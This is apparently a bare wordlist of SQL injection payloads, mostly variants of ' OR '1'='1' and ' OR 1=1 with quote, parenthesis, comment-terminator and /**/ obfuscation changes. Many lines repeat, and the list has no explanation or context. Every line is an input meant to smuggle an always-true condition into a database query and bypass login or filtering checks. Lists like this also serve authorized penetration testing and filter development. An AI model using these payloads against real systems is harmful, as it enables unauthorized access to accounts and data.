' OR '1'='1' --
' OR '1'='1' #
' OR '1'='1' /*
' OR 1=1 --
' OR 1=1 #
' OR 1=1 /*
" OR "1"="1" --
" OR "1"="1" #
" OR "1"="1" /*
' OR '1'='1
" OR "1"="1
' OR 'x'='x' --
' OR 'x'='x' #
' OR 'x'='x' /*
' OR 0=0 --
' OR 0=0 #
' OR 0=0 /*
' OR 'a'='a' --
' OR "a"="a" --
' OR ''=''
' OR 1=1--
' OR 1=1#
' OR 1=1/*
') OR '1'='1'--
') OR ('1'='1
' OR ('1'='1')--
' OR 1=1 OR ''=''
' OR 1=1--
' OR '1'='1')--
(1=1)--
' OR 1=1--
' OR '1'='1'--
' OR '1'='1' AND '1'='1
'/**/OR/**/'1'='1'--
'/**/OR/**/1=1--
' OR/**/'1'='1'--
' OR 1=1/**/--
' OR '1'='1'--
' OR 1=1--
' OR '1'='1'--
') OR 1=1--
') OR '1'='1'--
" OR 1=1--
" OR '1'='1'--
' OR 1=1--
' OR '1'='1'--
' OR 1=1 OR 1=1--
' OR ('1'='1')--
1=1--
' OR 1=1;--
' OR '1'='1';--
' OR '1'='1'-- -
' OR '1'='1' -- -
' OR 1=1 -- -
' OR 1=1-- -
" OR "1"="1" -- -
" OR "1"="1" -- -
' OR 'x'='x' -- -
' OR 0=0 -- -
' OR 'a'='a' -- -
' OR ''='' -- -
') OR '1'='1' -- -
') OR ('1'='1 -- -
' OR ('1'='1') -- -
' OR 1=1 -- -
' OR '1'='1') -- -
(1=1) -- -
' OR 1=1 OR ''='' -- -
' OR '1'='1' AND '1'='1 -- -
'/**/OR/**/'1'='1' -- -
' OR 1=1/**/ -- -
' OR '1'='1'-- -
' OR 1=1-- -
' OR '1'='1' -- -
' OR 1=1 -- -
' OR '1'='1'-- -
' OR 1=1-- -
' OR '1'='1' -- -
" OR 1=1 -- -
' OR 1=1 OR 1=1 -- -
' OR ('1'='1') -- -
1=1 -- -
' OR 1=1; -- -
' OR '1'='1'; -- -
' OR '1'='1' -- -
' OR 1=1 -- -